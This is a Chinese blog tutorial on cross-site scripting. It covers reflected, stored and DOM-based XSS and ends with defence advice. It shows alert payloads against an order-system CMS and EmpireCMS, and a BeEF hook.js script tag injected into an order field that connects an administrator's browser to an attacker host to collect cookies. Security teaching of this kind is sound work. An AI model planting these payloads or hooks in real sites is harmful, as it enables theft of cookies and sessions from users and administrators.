XXS漏洞(跨站脚本攻击)总结

已于 2023-12-25 17:06:10 修改
阅读量2.6k 收藏 46
点赞数 40
分类专栏: Web安全漏洞 文章标签: xss 网络安全
于 2023-12-21 12:09:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66458291/article/details/135127390
版权

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括JavaVBScriptActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容

常见的xss分类

反射型

攻击者构造带有xss攻击参数URL,恶意URL被服务器处理后返回并在用户的浏览器中执行。通过后端代码接收数据,然后将接收到的数据经处理后会把数据打印在浏览器上,浏览器根据自身的配置会对于接收到的数据进行处理,如果是脚本语言没有加以防护的话就会被浏览器当做脚本进行执行,触发跨站脚本。利用流程就是就是攻击者自己在网站发现有xss注入攻击的时候,攻击者自己构造网址具有xss的URL链接,诱导用户进行访问,从而构成反射性xss

DOM型

攻击者利用网页的 DOM(文档对象模型)结构漏洞,修改了网页的内容,使得恶意代码被执行。DOM型xss其实触发条件和反射型类似,不同的是反射型会将xss脚本通过后端代码进行传值处理,但是DOM型xss的执行均在前端执行

储存型

当攻击者发现有存储型xss漏洞时,攻击者将恶意的跨站注入脚本写入网站的数据库中,当有人再次访问这个网页的时候就会触存储型xss,进而进行xss攻击

原理案例分析

8ce4ac7fb5644b68b7b2af56a11c880c.png

接收数据并进行展示我们可以发现输入1,后在页面进行正常显示

8f86e93e72c0494cb118e7d0162d4184.png

由于页面没有做任何限制,我们可以输入JavaScript语句进行测试

743d48991d8546f796775e270c14f6ed.png

我们将参数改成了<script>alert(1)</script>我们可以发现,浏览器进行了弹窗

46d02519606042c0bcfa6653fb08419e.png

我们可以看到脚本语言在header中,而普通文本在body中,可以看出,浏览器对于我们输入的数据进行了处理

案例分析--反射型xss

我们在一个在线测试的工具网站发现有一个检测我们浏览器信息的功能,我们发现这个功能点没有做过滤,我们可以使用xss跨站语句使其执行跨站脚本,结果如下

cd3396550980406aa5317939cfd137ba.png

查看网页代码发现写入的跨站语句已经被当做脚本代码执行

9fd244daf9224017806c3ac6de25b264.png

案例分析--存储型xss

我们来到一个订单系统,我们在填写信息的时候,在具体要求的地方写入了跨站脚本工具语句,提交订单

a3aa1628e5eb4a65b893b3146e642cf6.png

编写完成后我们提交订单信息

cca13cd168254a8482040981cc029acf.png

作为一个订单程序cms,后台管理员会去后台查看订单信息,为此我们模拟管理员登录后去查看后台订单信息

94ea98df9092469bbe3cff8d9250b93b.png

发现浏览器产生弹窗

16fcf4e4c0dc4bee84498ba5e67a35a2.png

查看网页代码发现写入的跨站语句已经被当做脚本代码执行

7d8e06ba42344978a4d3e67d92b54797.png

证明我们的存储跨站脚本执行成功

BEEF xss平台的使用

存储型xss的利用,往往是盗用对方用户的cookie等敏感信息

我们借助beef平台进行实现

在实战中为了发挥其时实质价值,我们需要将其部署到公网IP上,这里做实验,直接使用kali中自带的beef

beeef的启动

970e0bdc467e48f6bc08b4c8de129b62.png

我们登陆后进入其后台页面

81b29d0f573b48ee879dcc86d1f96d28.png

我们在订单地址中写入

<script src="http://192.168.198.135:3000/hook.js"></script>

其实就是beef自带的一个xss攻击上线地址然后写入订单中

3b13cc16dd7a494fbe445dfd9cfed37b.png

当管理员访问后台订单查询的时候就会触发上线

ad38c080e10e4745b30a2e593ad4d339.png

就会获取到浏览器的相关信息如:cookie 浏览器版本等等

1f6ef7fa16fb4111aa5717f4fe65b6ff.png

当然如果将这个语句方放到正常的网页中,如果用户进行访问,也会被上线监测

案例分析--DOM型xss

DOM型xss最大的特点就是网站的语法是前端脚本语言写成我们可以通过查看源代码去查看其源码信息

案例分析

DOM XSS
<div class="page-content">

	<div id="xssd_main">
        <script>
            function domxss(){
                var str = document.getElementById("text").value;
                document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
            }
        </script>
        <!--<a href="" onclick=('xss')>-->
        <input id="text" name="text" type="text"  value="" />
        <input id="button" type="button" value="click me!" onclick="domxss()" />
		<div id="dom"></div>
    </div>


</div>

我们将其代码闭合后可以进行跨站代码的写入,并触发跨站代码

39f7993c53e745d1a19c83e80692a06c.png

查看源码

发现写入语句已经被当成了JavaScript标本进行解析执行

案例分析

用empireCMS访问/e/ViewImg/index.html?url=javascript:alert(1)地址就会触发JavaScript代码

源码分析

e54b7cd7cc944f34b8e922bfa3a1b4c6.png

根据源码的写法我们可以将url使用JavaScript的语法传入xss的跨站语句

d927d13cd67b4c2d97cf45d42c4ac754.png

XSS代码执行成功

25e1bc5dca2e4daeb00654ffa3064724.png

xss防护

输入验证和过滤:对用户的输入进行严格的验证和过滤,以防止恶意代码的注入。可以采用基于黑名单的过滤或基于白名单的过滤方式,后者通常具有更好的防御效果。

输出编码:在将用户的输入呈现到网页时,使用合适的输出编码方式,以防止恶意代码的执行。

设置HTTPOnly标志:在cookie中加入httponly属性可以在一定程度上保护用户的cookie,减少出现XSS时损失。

避免直接使用用户输入作为URL参数:避免将用户输入直接用作URL参数,可以防止反射型XSS攻击。

写在最后

如有错误,请及时指出,感谢

网安?阿哲
关注
  • 40
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XSS漏洞(跨站脚本攻击)
qq_41048303的博客
12-04 1948
1.原理 ​ 跨站脚本是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。是由于Web应用程序对用户的输入过滤不足又将输入输出到页面中导致。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会收到影响。 2.分类 反射型 反射型XSS也被称为非持久型XSS,是现在最容易出现的一种XSS漏洞。当用户访问一个带有XSS代码的URL请求时,服务器端接收到数据后处理,然后把带有XSS代码的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,最终造成XSS漏洞。 存储型 存储型XSS又被称为持久
网络安全XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1167
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
XSS跨站脚本攻击解析
lay77的博客
08-26 121
1.跨站脚本攻击 2.XSS 攻防案例 3.XSS 攻防 4.XSS 变形方式 5.XSS 的防御
跨站脚本攻击(XSS)
来日可期的博客
08-26 1388
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击,攻击者可以在合法网站或Web应用程序中执行恶意脚本。当wb应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS
XSS跨站脚本攻击漏洞
追求卓越
12-23 1145
XSS跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在网站中植入恶意的脚本代码,当其他用户访问该网站时,这些脚本代码会在用户的浏览器中执行。这可能会导致严重的安全后果,比如窃取用户的敏感信息,欺骗用户,或者在用户的浏览器中执行恶意操作。XSS漏洞通常出现在网站中输入数据未经过滤或者不当过滤的情况下,攻击者可以通过向网站发送带有恶意脚本的数据,使得脚本在用户的浏览器中执行。在反射型XSS中,攻击者向网站发送一个带有恶意脚本的URL,当其他用户点击该URL时,恶意脚本就会在用户的浏览器中执行。
post攻击 xxs_XSS(跨站脚本攻击)详解
weixin_35004618的博客
01-17 534
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!XSS分为:存储型 、反射型 、DOM型XS...
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 3215
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
wudideaqing的博客
06-24 1872
XSS跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
使用跨站脚本攻击客户端
2301_78256093的博客
10-31 126
跨站脚本攻击(英文缩写为 XSS)指的是将恶意代码注入到其他受信任的网站中。当网络犯罪分子将恶意脚本注入目标网站的内容中,然后将其包含在传送到受害者浏览器的动态内容中时,就会发生跨站脚本攻击。受害者的浏览器无从得知恶意脚本并不可信,因此会执行这些脚本。因此,恶意脚本可以访问由浏览器保留、并在该站点中使用的任何 Cookie、会话令牌或其他敏感信息。攻击者还可以使用 XSS 来传播恶意软件,重写网站内容,在社交网络上制造麻烦以及通过网络钓鱼获取用户凭据。
跨站脚本(XSS漏洞
梁辰兴的博客
06-07 4909
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
XSS跨站攻击课程.pdf
01-25
- **定义**:XSS(Cross-Site Scripting)即跨站脚本攻击,是指攻击者利用网站漏洞,将恶意脚本代码注入到网页中,当其他用户浏览这些网页时,就会在用户的浏览器上执行恶意代码。XSS攻击通常发生在用户与Web应用...
安全漏洞XSS攻击方法详解
01-26
XSS跨站脚本攻击)是网络安全领域中一种常见的攻击手段,主要针对Web应用程序。攻击者通过在网页中注入恶意脚本,当用户访问含有这些脚本的页面时,脚本会在用户的浏览器中执行,进而对用户进行攻击。XSS攻击的...
XSS漏洞解决方案实例
08-30
跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类...
漏洞扫描的原理与设计的研究
11-11
6. 动态扫描:通过与目标应用程序的交互,检测应用程序中可能存在的漏洞,如跨站脚本攻击XXS)、SQL 注入等。 漏洞扫描通过目标确定、信息收集、漏洞检测和结果报告等步骤实现对系统或应用程序中存在的漏洞进行...
网银漏洞修复汇总
07-12
XXS 跨站是一种跨站脚本攻击,恶意攻击者可以将恶意脚本注入到 web 页面中,从而盗取用户的敏感信息或控制用户的浏览器行为。为了防止 XXS 跨站,我们可以使用输入验证、输出编码和Content Security Policy 等方法来...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 623
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于NSGA-II的智能车辆换道轨迹规划与优化_查云飞.caj
最新发布
07-31
基于NSGA-II的智能车辆换道轨迹规划与优化_查云飞
跨站脚本攻击xxs)与SQL注入攻击的异同
06-13
跨站脚本攻击XSS)和SQL注入攻击都是常见的网络安全问题,但它们的攻击方式和目的不同。 XSS攻击是通过在网页中注入恶意代码,使得用户在浏览网页时执行恶意代码,从而达到攻击的目的。攻击者可以通过XSS攻击窃取用户的信息、篡改网页内容等,甚至可以将用户重定向到恶意网站。 SQL注入攻击是通过在应用程序中注入恶意SQL代码,使得攻击者可以访问和操作数据库中的数据。SQL注入攻击可以导致数据泄露、数据损坏,甚至可以使得整个应用程序崩溃。 因此,XSS攻击主要是针对用户,而SQL注入攻击主要是针对应用程序和数据。防范XSS攻击需要对输入的数据进行过滤和转义,防范SQL注入攻击需要对SQL语句进行参数化处理和过滤。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值